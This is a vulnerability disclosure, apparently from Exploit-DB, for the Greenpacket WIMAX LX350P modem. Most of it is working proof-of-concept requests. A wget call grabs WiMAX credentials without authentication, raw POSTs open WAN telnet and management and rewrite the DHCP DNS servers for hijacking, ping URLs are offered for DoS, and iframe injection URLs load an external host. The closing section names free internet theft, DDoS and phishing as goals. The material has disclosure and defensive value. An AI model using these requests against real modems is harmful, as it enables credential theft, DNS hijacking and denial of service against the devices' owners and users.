WIMAX LX350P(WIXFMR-108) - Multiple Vulnerabilities

vendor:

WIMAX LX350P(WIXFMR-108)

by:

Alireza Azimzadeh Milani

N/A

CVSS

N/A

Multiple Vulnerabilities

CWE

Product Name: WIMAX LX350P(WIXFMR-108)

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Kali-Linux

2015

WIMAX LX350P(WIXFMR-108) – Multiple Vulnerabilities

The attacker can bypass the authentication mechanism in the WIMAX LX350P(WIXFMR-108) modem by upgrading the firmware.

Mitigation:

Unknown

Source

Exploit-DB raw data:

### Exploit Title: WIMAX LX350P(WIXFMR-108) - Multiple Vulnerabilities
### Date: ˝Friday, ˝December ˝11, ˝2015
### Exploit/Vulnerability Author: Alireza Azimzadeh Milani (alimp5)
### Vendor Homepage: http://www.greenpacket.com
### Version: v2.10.14-g1.5.2
### Tested on: Kali-Linux

I'm an ethical penetration tester and super moderator of Iran Security Team(http://irsecteam.org)
I have updated the modem to latest firmware which released by the company.
but with this work(upgrading the firmware); The attacker can bypass the authentication mechanism.  

### Details of LX350P model:
Device Information:
Hardware model:	WIXFMR-108
Firmware version:	v2.10.14-g1.5.2-mobinnet
Firmware version:	v2.10.14-g1.5.2
Firmware creation date:	Mon Aug 15 16:45:58 2013
Frequency range:	3300000KHz~3600000KHz
Serial number:	DXHKC120702523

I used below tools to find the vulnerabilities:
1)BurpSuite - Free Edition     2)wget      3)Nmap


### POCs of the modem:
#Get wimax credentials>>
wget -c "http://server/ajax.cgi?action=tag_init_wimax_auth.php"

#Enable and Change DMZ_Host IP in Firewall(request manipulating with BurpSuie)>>
POST /ajax.cgi?action=net_firewall HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Language=en; page=net_firewall.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
NETFILTER_FW_IPFILTER=&MGMT_WEB_WAN=on&MGMT_TELNET_WAN=on&NETFILTER_DMZ_HOST=8.8.8.8&btnSubmit=1

#Ping a system: (We can use from below query for launching (D)DOS attacks>> 
http://server/ajax.cgi?action=tag_ipPing&pip=4.2.2.4&cache=false
http://server/ajax.cgi?action=tag_ipPing&pip=192.168.1.1&cache=false
http:/server/ajax.cgi?action=tag_ipPing&pip=192.168.1.1&cache=false

#Get info about WAN MAC, LAN MAC, DHCP + ... >>
http://server/ajax.cgi?action=tag_init_net_dhcp.php&cache=false

#Change the DNS IP Addresses (DNS Hijacking, Spoofing)>>
POST /ajax.cgi?action=net_dhcp HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Language=en; page=net_dhcp.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 945
DHCPD_STATIC_LEASE=&DHCPD_ENABLE=1&DHCPD_START_IP_01=192&DHCPD_START_IP_02=168&DHCPD_START_IP_03=1&DHCPD_START_IP_04=2&DHCPD_START_IP=192.168.1.2&DHCPD_END_IP_01=192&DHCPD_END_IP_02=168&DHCPD_END_IP_03=1&DHCPD_END_IP_04=200&DHCPD_END_IP=192.168.1.200&dns_type_1=2&DNS_IP_1_01=6&DNS_IP_1_02=6&DNS_IP_1_03=6&DNS_IP_1_04=6&DNS_IP_1=6.6.6.6&dns_type_2=2&DNS_IP_2_01=8&DNS_IP_2_02=8&DNS_IP_2_03=8&DNS_IP_2_04=8&DNS_IP_2=8.8.8.8&dns_type_3=1&DNS_IP_3_01=0&DNS_IP_3_02=0&DNS_IP_3_03=0&DNS_IP_3_04=0&DNS_IP_3=&DHCPD_LEASE_TIME=1440&btnSubmit=1&DHCPD_DNS=2%2C6.6.6.6+2%2C8.8.8.8+1%2C0.0.0.0&ippt_enable=0&Active_0=Y&Interface_0=1&Protocol_0=1&SrcPort_0=68&DestPort_0=67&Comment_0=DHCP+request+from+lan&Active_1=Y&Interface_1=2&Protocol_1=1&SrcPort_1=67&DestPort_1=68&Comment_1=DHCP+response+from+wan&IPPT_EXCEPTION=1%2CY%2C1%2C1%2C68%2C67%2CDHCP+request+from+lan%3B2%2CY%2C2%2C1%2C67%2C68%2CDHCP+response+from+wan%3B&IPPT_EXCEPTION_NUM=2

#Frame Injection>>
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>&sid=DtTrEZnLke5Z&cache=false&time=1449547319726  
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>&sid=DtTrEZnLke5Z&cache=false
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>cache=false
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>&time=3  
 

### Conclusion: 
1)the attacker can read sensitive information and set it on his own modem. such: for using free internet.
2)Anyone who can send a packet to the modem for crashing/downgrading/DOS.
3)An attacker might use "Frame Injection" to redirect users to other malicious websites that are used for phishing and similar attacks.
4)To obtain the control of similar modem(LX350P) in order to launching DOS or DDOS attacks on targets in WWW(world wide web).  


At the end, I am thankful and I wait for your response.